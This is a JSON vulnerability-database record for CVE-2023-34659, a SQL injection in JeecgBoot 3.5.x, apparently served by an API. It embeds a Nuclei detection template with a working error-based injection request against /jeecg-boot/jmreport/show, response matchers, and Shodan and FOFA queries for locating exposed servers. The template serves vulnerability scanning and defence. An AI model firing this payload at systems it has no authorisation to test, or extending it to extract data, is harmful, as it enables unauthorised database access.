{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2023-34659/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2023-34659/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2023-34659/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2023-34659/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2023-34659/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2023-34659"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2023-34659"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2023/CVE-2023-34659.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2023-34659\n\ninfo:\n  name: JeecgBoot 3.5.0 - SQL Injection\n  author: ritikchaddha\n  severity: critical\n  description: |\n    jeecg-boot 3.5.0 and 3.5.1 have a SQL injection vulnerability the id parameter of the /jeecg-boot/jmreport/show interface.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n  remediation: |\n    Upgrade JeecgBoot to a patched version or apply the necessary security patches provided by the vendor.\n  reference:\n    - https://github.com/jeecgboot/jeecg-boot/issues/4976\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-34659\n    - https://github.com/izj007/wechat\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2023-34659\n    cwe-id: CWE-89\n    epss-score: 0.1248\n    epss-percentile: 0.96075\n    cpe: cpe:2.3:a:jeecg:jeecg_boot:3.5.0:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: jeecg\n    product: jeecg_boot\n    shodan-query: http.favicon.hash:1380908726\n    fofa-query: icon_hash=1380908726\n  tags: cve2023,cve,jeecg,sqli,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /jeecg-boot/jmreport/show HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json;charset=UTF-8\n\n        {\"id\":\"961455b47c0b86dc961e90b5893bff05\",\"apiUrl\":\"\",\"params\":\"{\"id\":\"1' or '%1%' like (updatexml(0x3a,concat(1,(version())),1)) or '%%' like '\"}\"}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"XPATH syntax error:\"\n          - \"SQLException\"\n        condition: and\n\n      - type: word\n        part: header\n        words:\n          - application/json\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100d51e9b23e42846f5e23b06f3f756314ff45aa279e7db112443ba6b89ee1e6d7a0221009154b689ed8265176c44d0daaa04b0178bba6c208faecb80a35b0216f2d85355:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2023-34659"
}